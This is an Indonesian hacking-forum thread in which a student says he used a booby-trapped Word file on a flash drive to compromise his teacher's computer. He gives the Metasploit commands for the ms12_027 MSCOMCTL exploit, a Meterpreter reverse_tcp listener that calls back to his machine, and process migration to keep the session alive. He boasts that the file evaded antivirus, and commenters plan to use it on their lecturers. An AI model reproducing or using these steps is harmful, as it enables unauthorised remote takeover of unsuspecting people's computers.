Payload with MS.Word document
#11
Ckckckck .... kamu nakal -_-
[Image: Zeroliers-1.png]

#12
Thumbs Up 
kwekwkwkw =)) buat ngerjain guru sip dah Big Grin

#13
ati2 gurunya bales dendam ntar ente di bales hahaha

ati2 ntar gurunya bales dendam Big Grin

#14
(06-25-2013, 07:23 PM)wahyuardan Wrote: apakah semua versi ms.office om yang terkena buffer overlow..?atau versi tahun berapa..?
Nice tuturial om Smile
pertanyaan bagus om :-bd

ini ane test di ms.Word 2007
di coba saja om ke ms2010 / 2013

nanti lapor di mari :d

dan ini payload ane test di Smadav,lolos om dari deteksi virus :d

(06-25-2013, 08:12 PM)HambaAllah Wrote: kwekwkwkw =)) buat ngerjain guru sip dah Big Grin

wkwkw...
ane gak tanggung jawab ah Confused:- =))
Klik Here

Clound@IBTeam:~#
EMail Me : [email protected]

#15
(06-25-2013, 12:19 AM)Clound_Carbelius Wrote: halo semua...
udah lama gw gak update di mari, sibuk skolah Angry

ane mau curhat,sekalian share ilmu nih
Spoiler! :

waktu itu saya ada tugas sekolah,mengunakan Ms.Office Word
semua teman saya sudah memberikan tugas mereka masing-masing lewat flash disk nya

dan saya lagi itu kebetulan tugas nya lupa di copy ke flash disk -_-
idea gila ini datang ketika saya mengetikan "route" pada laptop saya
dan saya melakukan scaning dengan Nmap.ternyata saya dan guru saya berada dalam satu jaringan yang sama

idea saya adalah membuat overlow aplikasi ms.office guru saya,agar dia tak bisa melihat tugas saya.
karna file .doc saya ini bukan ducument sebenar nya,melainkan payload :v

dan saya setting autorun pada flash disk,
sebelum mendatangi meja guru tersebut saya sudah menjalankan Reverse_tcp,dan mendengarkan ip yg masuk ke meterpreter
hanya tinggal menungu korban menjalankan file saya..

dengan bangga saya mengahpiri meja guru itu
dan menyolokan Flash saya sendiri
alhasil aplikasi guru saya itu langsung "Not Responding"
saya beralasan,kalau file tersebut terkena virus
dan minta izin untuk ngumpulin lagi besok

begitu saya kembali ke meja saya,meterpreter terbuka
rencana sih mau di jailin tuh guru
tapi sian ah =)) Smile)

sekian cerita dari saya Clound


tapi bagaimana cara membuat Payload berextension .doc
Smile:-

ketik di msfconsole kalian :
Quote:> use exploit/windows/fileformat/ms12_027_mscomctl_bof
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit

tahap ini kita hanya baru membuat file payload nya aja
file payload nya berada di folder : /root/.msf4/local/

jika sudah siap semua,
langsung jalankan exploit multi_handler

Quote:> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit

nah,tinggal tungguin aja korban menjalankan payload tersebut



tambahan sedikit,
begitu ms.office "not responding"
biasa nya dia langsung exit dengan sendiri nya,arti nya payload kita juga akan exit

segera lakukan migrate ke aplikasi lain,dengan membaca proses yg di lakukan si target Big Grin



karna kalau udah migrate,meterpreter kita tak bisa di hentikan,apa lagi klo migrate nya ke prosses system

ok,thank's sekian dari gw Clound

gak nolak di sambit cendol Wink

mantap banget bang. bisa di praktekin ke dosen ane besok dah =))
Information Is The Most Dangerous Weapon In The World

#16
wkwkw... =))
dosen jdi target embuk =))

mudah"an dosen nya heker,biar bisa nangkis kejailan para mahasiswa nya Smile)
Klik Here

Clound@IBTeam:~#
EMail Me : [email protected]

#17
bisa buat pas ane TA besok ni ,, Powerpointnya ane jebak juga bisa kali ya ,,
:v
Nothing Impossible | Learn, Understand, Share | We Are Staff of Expert Zone Technology

#18
(06-27-2013, 08:13 PM)ino_ot Wrote: bisa buat pas ane TA besok ni ,, Powerpointnya ane jebak juga bisa kali ya ,,
:v

payload untuk untuk ppt/pptx ya om :-?
kaya nya ada deh Big Grin

nanti kalo ane ada waktu,ane share \m/
Klik Here

Clound@IBTeam:~#
EMail Me : [email protected]

#19
(06-26-2013, 03:42 PM)Clound_Carbelius Wrote:
(06-25-2013, 07:23 PM)wahyuardan Wrote: apakah semua versi ms.office om yang terkena buffer overlow..?atau versi tahun berapa..?
Nice tuturial om Smile
pertanyaan bagus om :-bd

ini ane test di ms.Word 2007
di coba saja om ke ms2010 / 2013

nanti lapor di mari :d

dan ini payload ane test di Smadav,lolos om dari deteksi virus :d
targetnya sih berdasarkan command show targets
ini
Code:
0   Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English
   1   Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English
belum coba juga yang office 2010 Big Grin nanti coba kalau udah masuk sekolah lagi akaka
Every one Have Superiority that you don't know..

#20
keren om post ny Smile
tp itu korban ny windows xp atau 7 ya ?
Ane exploit win 7 gagal trus Sad






Users browsing this thread: 1 Guest(s)